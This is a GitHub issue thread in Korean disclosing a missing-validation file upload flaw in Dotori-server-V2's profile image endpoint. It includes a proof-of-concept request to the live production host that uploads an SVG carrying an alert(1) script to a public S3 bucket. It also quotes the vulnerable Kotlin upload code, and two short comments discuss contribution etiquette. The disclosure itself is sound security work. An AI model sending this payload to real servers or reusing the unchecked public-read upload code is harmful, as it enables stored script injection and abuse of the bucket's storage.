### ISSUE TITLE
Dotori-server-V2에 프로필사진 파일 업로드 취약점이 있습니다.

### ISSUE THREAD

**Issue by Jueuunn7** [Team-Ampersand/Dotori-server-V2#356]
버킷에 파일 업로드 시, 검증 로직이 없어서 콘텐츠 타입 변조를 통해 공격자가 원하는 파일을 업로드할 수 있습니다.
s3에 업로드되어 악성코드가 서버에서 실행되진 않지만 버킷 비용, 사이드 이펙트 같은 문제가 있을 수 있습니다.

## Payload
아래 요청처럼 파일 확장자와 콘텐츠를 변조시켜 원하는 파일을 업로드 시킬 수 있습니다.
```svg
POST /v2/members/profileImage HTTP/2
Host: server-v2.dotori-gsm.com

-------HEADER---------

Content-Disposition: form-data; name="image"; filename="blob.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">
    alert(1);
  </script>
</svg>


------S3 url-------
https://dotori-s3.s3.ap-northeast-2.amazonaws.com/img/2d35b298-01fb-4766-b718-f0e53184b3a0blob.svg
https://dotori-s3.s3.ap-northeast-2.amazonaws.com/img/3024ed0a-0180-4883-9d0a-f55f65fbca81blob.svg
```
![image](https://github.com/Team-Ampersand/Dotori-server-V2/assets/132628016/13ddad02-4614-48dc-8f73-8e0207b0bfe8)

프로필 이미지 버킷에 접속하면 삽입한 파일이 응답됩니다.
![image](https://github.com/Team-Ampersand/Dotori-server-V2/assets/132628016/95f1cd9c-125e-47fe-91f0-6ac77c3036bb)
![image](https://github.com/Team-Ampersand/Dotori-server-V2/assets/132628016/583ff602-0cd4-4b02-83ae-22aa8842e86c)

## Code
[/src/main/kotlin/com/dotori/v2/global/thirdparty/aws/s3/S3ServiceImpl.kt#L48](https://github.com/Team-Ampersand/Dotori-server-V2/blob/fd63f6d514f293fe7ae0e8811ecefc4efb8f9afa/src/main/kotlin/com/dotori/v2/global/thirdparty/aws/s3/S3ServiceImpl.kt#L48)
현재 코드는 파일의 확장자나 콘텐츠타입 검사 없이 업로드되어 파일 업로드 공격을 할 수 있습니다
```kt
    override fun uploadSingleFile(multipartFile: MultipartFile?): String? {
        if (multipartFile == null || multipartFile.isEmpty) {
            return null
        }

        val fileName = createFileName(multipartFile.originalFilename.orEmpty())
        val objectMetadata = ObjectMetadata().apply {
            contentLength = multipartFile.size
            contentType = multipartFile.contentType
        }

        try {
            amazonS3.putObject(
                PutObjectRequest(bucket, fileName, multipartFile.inputStream, objectMetadata)
                    .withCannedAcl(CannedAccessControlList.PublicRead)
            )
            return url+fileName
        } catch (e: IOException) {
            throw IllegalStateException("파일 업로드에 실패했습니다.")
        }
    }
```

**Comment by esperar** [comment]
도토리가 오픈소스라서 기여해주시는 점은 정말 고맙게 생각합니다. 그렇지만 이러한 이슈가 존재하면 바로 PR을 날리시는 것 보단 이슈를 통해 먼저 저희 팀원들과 논의해보고 누가 assign할지(저희 팀 내부에서 처리할지, 이슈어에게 assign할지) 정해보는 것이 먼저인 것 같습니다.

**Comment by tlsgmltjd** [comment]
성급하게 결정한 점은 죄송하게 생각합니다.. 다시 생각해보니 이슈 파악 후 먼저 팀 내부에서 논의할 수 있도록 알려드리는 것이 먼저라고 생각됩니다. 당황스러우실 수 있는 상황이였는데 리뷰 남겨주셔서 감사드립니다. 앞으로는 한번 더 생각하고 기여하도록 하겠습니다!
